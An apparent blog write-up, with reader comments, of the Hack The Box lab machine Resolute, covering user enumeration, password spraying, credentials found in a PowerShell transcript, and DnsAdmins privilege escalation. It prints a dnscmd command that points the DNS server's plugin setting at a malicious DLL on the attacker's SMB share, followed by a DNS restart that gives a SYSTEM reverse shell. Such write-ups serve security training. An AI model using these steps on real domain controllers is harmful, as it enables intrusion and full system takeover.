Hack The Box Resolute Writeup – 10.10.10.169

Hack The Box Resolute Writeup - 10.10.10.169

Hack The Box Resolute is my 2nd Windows machine I owned in less than 10 days. Last week I owned the Control and published a writeup in my blog yesterday, and again today very happily posting my second windows machine writeup. TBH, I love working on Windows machines than Linux, yes it is weird compared to my fellow infosec pros.

Let us start..

Btw, I think, getting user of this machine is one of the easiest tasks I ever had on HTB. Let’s start.

Like previous windows based machine, I added IP 10.10.10.169 to my etc/hosts as resolute.htb and preoceed to port scan using namp.

NAMP SCAN RESULTS

Since the machine is Windows and I had similar experience earlier with Forest machine (writeup here) a few days ago, I decided to use Enum4Linux to gather more information about the domain, DNS, users and other information.

ENUM4LINUX SCAN RESULTS

I have handfull of information about the Resolute box now. I have the workgroup name, I have the security and password complexity and other info, I have the security groups info, I have the list of users and their roles info and clear text password of a user.

GETTING USER

Let us exploit SAMBA Service using RPCClient tool. Before that, let us gather some more information about the user Marko who’s password we have in clear text format in the Enum4Linux scan.

I tried to run EvilWinRM suing the user Marko’s credentials, but it didn’t work. So, I guessed that Marko doesn’t have access to the system or his account is locked out. I decided to use the same password for the rest of the users, the password Welcome123! was worked for Melanie.

PRIVILEGE ESCALATION

The HTB Forum is always helpful, I get a lot of good nudges over there. One of the users left a hint to -force the root of the user, so I did ;). Btw, the -force switch shows the hidden directories.

I noticed the directory “PSTranscripts” and went on finding what is inside. The directory has a folder “20191203” inside, and there is a text file called “PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt”. The text file is a PowerShell transcript. I used Type to read the text file, here is the full transcript.

The transcript is a jackpot for me, I found a lot of useful information including user Rayn (probably a System Administrator), link to backups, system files location etc.

I’m going to use EvilWinRM again to login as Ryan.

I’m in the system as Ryan.

Let us see what Ryan has access to:

So the enumeration of the groups shows the user Ryan belongs to the MEGABANK\DnsAdmins group, so we can run some queries as Administrator using our current user Ryan.

A DNSAdmin is a full privileged Administrator of a server. We can run any commands or tasks as Administrator if the user has DNSAdmin group membership.

So we can create an executable file like nc.exe or a dll file to have a reverse connection. I decided to make a Samba share and upload our nc.exe and a newly malicious dll file using msfvenom.

CREATE A MALICIOUS PAYLOAD

RUN AN SMB SHARE

START THE LISTENER

RUN DNS COMMAND (from Resolute)

The DNSCommand in Windows is for managing DNS servers. This utility is useful in scripting batch files to help automate routine DNS management tasks or to perform simple unattended setup and configuration of new DNS servers on a network. Ref

Here I’m going to use the dnscmd to execute serverplugindll with my malicious dll link from my SMB share. The first command "dnscmd resolute /config /serverlevelplugindll \10.10.14.21\resolute\nav1n.dll"modifies the registry of ServerPluginDLL property with our code.

The second and third command sc.exe \resolute stop dns and sc.exe \resolute start dns stops and starts the DNS server. When DNS server restarts our custom modified code in the ServerlevelPluginDLL executes the command, my listener will get a reverse shell as System.

REVERSE CONNECTION AS SYSTEM

Thank you for reading, hope you enjoyed it.

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: https://www.hackthebox.eu/home/users/profile/68523

View all posts by Navin →
Subscribe
Notify of
guest
10 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
vbscrub
5 months ago

Interesting to see how you went about the DNS priv esc. I didn’t think of doing it that way. I just wrote a legit DNS plugin DLL that had my own code in it to read the flag from the admin desktop and write it out to a file I could read from Powershell. I thought if the DLL was not a legit DNS plugin with exports like DnsPluginInitialize then it is meant to stop the DNS Server service from starting, so I’m surprised your method worked. Maybe I’m misunderstanding and you did do that as well. PS you’re not… Read more »

trackback
4 months ago

[…] Hack The Box Resolute Writeup – 10.10.10.169 […]

nando
nando
4 months ago

Hey

When you started the listener, port should be 4444, same one the venom is calling back, no?

I rooted the easy way, with a psexec with metasploit.

allure
allure
4 months ago

This might be a really out of the topic question but what terminal is that. Kinda making me curious haha.

Jaime
Jaime
3 months ago

When you restart the DC you need to type command like “sc.exe stop dns”.
Why the FQDN of this DC is “resolute” not “resolute.megabank.local”?
I’m really confused about that. Please tell me.

Sorry, that action is blocked.
%d bloggers like this: